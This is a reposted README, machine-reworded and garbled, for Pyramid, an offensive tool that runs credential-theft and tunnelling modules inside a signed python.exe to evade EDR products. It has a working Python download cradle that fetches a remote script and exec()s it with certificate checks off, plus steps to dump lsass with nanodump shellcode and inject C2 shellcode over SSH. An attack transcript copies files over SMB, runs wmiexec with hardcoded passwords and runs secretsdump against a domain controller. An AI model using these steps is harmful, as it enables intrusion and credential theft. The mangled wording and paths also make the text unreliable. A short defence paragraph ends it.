Pyramid is a set of Python scripts and module dependencies that can be utilized to evade EDRs. The primary objective of the device is to carry out offensive duties by leveraging some Python evasion properties and searching as a legit Python software utilization. This may be achieved as a result of:
- the Python Embeddable package deal supplies a signed Python interpreter with good popularity;
- Python has many legit functions, so there’s a number of completely different telemetry coming from the python.exe binary because the interpreter natively runs the APIs. This may be abused by working inside the Python.exe course of and attempting to mix within the large “telemetry fingerprint” of python.exe binary.
- There’s a lack of auditing for Python code execution – PEP-578 tried to resolve that however the inventory python.exe binary doesn’t have auditing capabilities enabled by default.
- Operations may be accomplished natively from inside python.exe natively utilizing Python language to carry out submit exploitation duties corresponding to dynamically importing Python modules to run offensive instruments and executing Beacon Object Recordsdata (after some BOF modifications) straight inside python.exe.
For extra info please test the DEFCON30 – Adversary village speak “Python vs Fashionable Defenses” slide deck and this submit on my weblog.
Disclaimer
This device was created to demostrate a bypass technique towards EDRs primarily based on some blind-spots assumptions. It’s a mixture of already present strategies and instruments in a (to one of the best of my information) novel means that may assist evade defenses. The only real intent of the device is to assist the neighborhood rising consciousness round this sort of utilization and speed up a decision. It’ not a 0day, it is not a full fledged shiny C2, Pyramid exploits what could be EDRs blind spots and the device has been made public to shed some mild on them. A protection paragraph has been included, hoping that skilled blue-teamers can assist contribute and supply higher doable decision on the difficulty Pyramid goals to focus on. All info is supplied for academic functions solely. Observe directions at your personal danger. Neither the creator nor his employer are liable for any direct or consequential injury or loss arising from any individual or group.
Credit
Pyramid is utilizing some superior instruments made by:
Contributors
snovvcrash – base-DonPAPI.py – base-LaZagne.py – base-clr.py
Present options
Pyramid capabilities are executed straight from python.exe course of and are at the moment:
- Dynamic loading of BloodHound Python, impacket secretsdump, paramiko, DonPAPI, LaZagne, Pythonnet, pproxy.
- BOFs execution utilizing in-process shellcode injection.
- In-process injection of a C2 agent and tunneling its site visitors with native SSH port forwarding.
Device’s description
Pyramid is supposed for use unpacking an official embeddable Python package deal after which working python.exe to execute a Python obtain cradle. This can be a easy option to keep away from creating unusual Course of tree sample and searching like a traditional Python software utilization.
In Pyramid the obtain cradle is used to succeed in a Pyramid Server (easy HTTPS server with auth) to fetch base scripts and dependencies.
Base scripts are particular for the characteristic you wish to use and comprise:
- Customized Finder class to in-memory import required dependencies (zip recordsdata).
- Code to obtain the required dependencies.
- Foremost logic for the module you wish to execute (bloodhound, secretsdump, paramiko and many others.).
BOFs are ran by way of a base script containing the shellcode resulted from bof2shellcode and the associated in-process injection code.
The Python dependencies have been already fastened and modified to be imported in reminiscence with out conflicting.
There are at the moment 8 foremost base scripts obtainable:
- base-bh.py script will in-memory import and execute python-BloodHound.
- base-secretsdump.py script will in-memory import and execute Impacket secretsdump.
- base-BOF-lsass.py script is utilizing a stripped model of nanodump to dump lsass from python.exe. That is achieved in-memory injecting shellcode output obtained from bof2shellcode and COFFloader. To make advanced BOFs work with this system, they need to first be tailored for Python execution.
- base-tunnel-inj.py script import and executes paramiko on a brand new Thread to create an SSH native port ahead to a distant SSH server. Afterward a shellcode may be domestically injected in python.exe.
- base-DonPAPI.py script will in-memory import and execute DonPAPI. Outcomes and credentials extracted are saved on disk within the Python Embeddable Package deal Listing.
- base-LaZagne.py script will in-memory import and execute LaZagne
- base-tunnel-socks5 script import and executes paramiko on a brand new Thread to create an SSH distant port ahead to an SSH server, then a socks5 proxy server is executed domestically on course and made accessible remotely by way of the SSH tunnel.
- base-clr script imports Pythonnet to load and execute a .NET meeting in-memory.
Utilization
Beginning the server
git clone https://github.com/naksyn/Pyramid
Generate SSL certificates for HTTP Server:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
Instance of working Pyramid HTTP Server utilizing SSL certificates and by offering Primary Authentication:
python3 PyramidHTTP.py 443 testuser Sup3rP4ss! /residence/consumer/SSL/key.pem /residence/consumer/SSL/cert.pem /residence/consumer/Pyramid/Server/
Modifying Base Scripts
base-bh.py
Insert AD particulars and HTTPS credentials within the higher a part of the script.
base-secretsdump.py
Insert AD particulars and HTTPS credentials within the higher a part of the script.
base-BOF-lsass.py
The nanodump BOF has been modified stripping Beacon API calls, cmd line parsing and hardcoding enter arguments as a way to use the method forking approach and outputting lsass dump to C:UsersPublicvideo.avi. To alter these settings modify nanodump supply file entry.c accordingly and recompile the BOF. Then use the device bof2shellcode giving as enter the compiled nanodump BOF:
python3 bof2shellcode.py -i /residence/consumer/bofs/nanodump.x64.o -o nanodump.x64.bin
You may remodel the ensuing shellcode to python format utilizing msfvenom:
msfvenom -p generic/customized PAYLOADFILE=nanodump.x64.bin -f python > sc_nanodump.txt
Then paste it into the bottom script inside the shellcode variable.
base-tunnel-inj.py
Insert SSH server, native port ahead particulars particulars and HTTPS credentials within the higher a part of the script and modify the sc variable utilizing your most well-liked shellcode stager. Bear in mind to tunnel your site visitors utilizing SSH native port ahead, so the stager ought to have 127.0.0.1 as C2 server and the SSH listening port because the C2 port.
base-DonPAPI.py
Insert AD particulars and HTTPS credentials within the higher a part of the script.
base-LaZagne.py
Insert HTTPS credentials within the higher a part of the script and alter lazagne module if wanted.
base-clr.py
Insert HTTPS credentials within the higher a part of the script and meeting bytes of the file you wish to load.
base-tunnel-socks5.py
Insert parameters within the higher a part of the script.
Unzip embeddable package deal and execute the obtain cradle on course
As soon as the Pyramid server is working and the Base script is prepared you may execute the obtain cradle from python.exe. A Python obtain cradle may be so simple as:
import urllib.request
import base64
import sslgcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
gcontext.check_hostname = False
gcontext.verify_mode = ssl.CERT_NONE
request = urllib.request.Request('https://myIP/base-bof.py')
base64string = base64.b64encode(bytes('%s:%s' % ('testuser', 'Sup3rP4ss!'),'ascii'))
request.add_header("Authorization", "Primary %s" % base64string.decode('utf-8'))
outcome = urllib.request.urlopen(request, context=gcontext)
payload = outcome.learn()
exec(payload)
Keep in mind that urllib is an Embeddable Package deal native Python module, so that you needn’t set up extra dependencies for this cradle. The downloaded python “base” script will in-memory import the dependencies and execute its capabilites inside the python.exe course of.
Executing Pyramid with out seen immediate
To execute Pyramid with out mentioning a visual python.exe immediate you may leverage pythonw.exe that will not open a console window upon execution and is contained in the exact same Home windows Embeddable Package deal. The next image illustrate an instance utilization of pythonw.exe to execute base-tunnel-socks5.py on a distant machine with out opening a python.exe console window.
The assault transcript is reported under:
Begin Pyramid Server:
python3 PyramidHTTP.py 443 testuser Sup3rP4ss! /residence/nak/tasks/dev/Proxy/Pyramid/key.pem /residence/nak/tasks/dev/Proxy/Pyramid/cert.pem /residence/nak/tasks/dev/Proxy/Pyramid/Server/
Save the bottom obtain cradle to cradle.py.
Copy unpacked home windows Embeddable Package deal (with cradle.py) to focus on:
smbclient //192.168.1.11/C$ -U area/consumer -c 'immediate OFF; recurse ON; liquid crystal display /residence/consumer/Downloads/python-3.10.4-embed-amd64; cd UsersPublic; mkdir python-3.10.4-embed-amd64; cd python-3.10.4-embed-amd64; mput *'
Execute pythonw.exe to launch the cradle:
/usr/share/doc/python3-impacket/examples/wmiexec.py area/consumer:"Password1!"@192.168.1.11 'C:UsersPublicpython-3.10.4-embed-amd64pythonw.exe C:UsersPublicpython-3.10.4-embed-amd64cradle.py'
Socks5 server is working on course and SSH tunnel needs to be up, so modify proxychains.conf and tunnel site visitors by way of goal:
proxychains impacket-secretsdump area/consumer:"Password1!"@192.168.1.50 -just-dc
Limitations
Dynamically loading Python modules doesn’t natively assist importing *.pyd recordsdata which are primarily dlls. The one public resolution to my information that solves this downside is supplied by Scythe *(in-memory-execution) by re-engineering the CPython interpreter. In ordrer to not lose the digital signature, one resolution that will permit utilizing the native Python embeddable package deal entails dropping on disk the required pyd recordsdata or wheels. This could not have vital OPSEC implications usually, nevertheless keep in mind that the next wheels containing pyd recordsdata are dropped on disk to permit Dinamic loading to finish: *. Cryptodome – wanted by Bloodhound-Python, Impacket, DonPAPI and LaZagne *. bcrypt, cryptography, nacl, cffi – wanted by paramiko
- please notice that working BOFs doesn’t want dropping any pyd on disk since this strategies solely entails shellcode injection.
defend from this system
Python.exe is a signed binary with good popularity and doesn’t present visibility on Python dynamic code. Pyramid exploits these evasion properties finishing up offensive duties from inside the identical python.exe course of.
For that reason, some of the environment friendly resolution could be to dam by default binaries and dlls signed by Python Basis, creating exceptions just for customers that really want to make use of python binaries.
Alerts on downloads of embeddable packages will also be raised.
Deploying PEP-578 can also be possible though advanced, it is a pattern implementation. Nevertheless, deploying PEP-578 with out blocking the utilization of inventory python binaries might make this countermeasure ineffective.
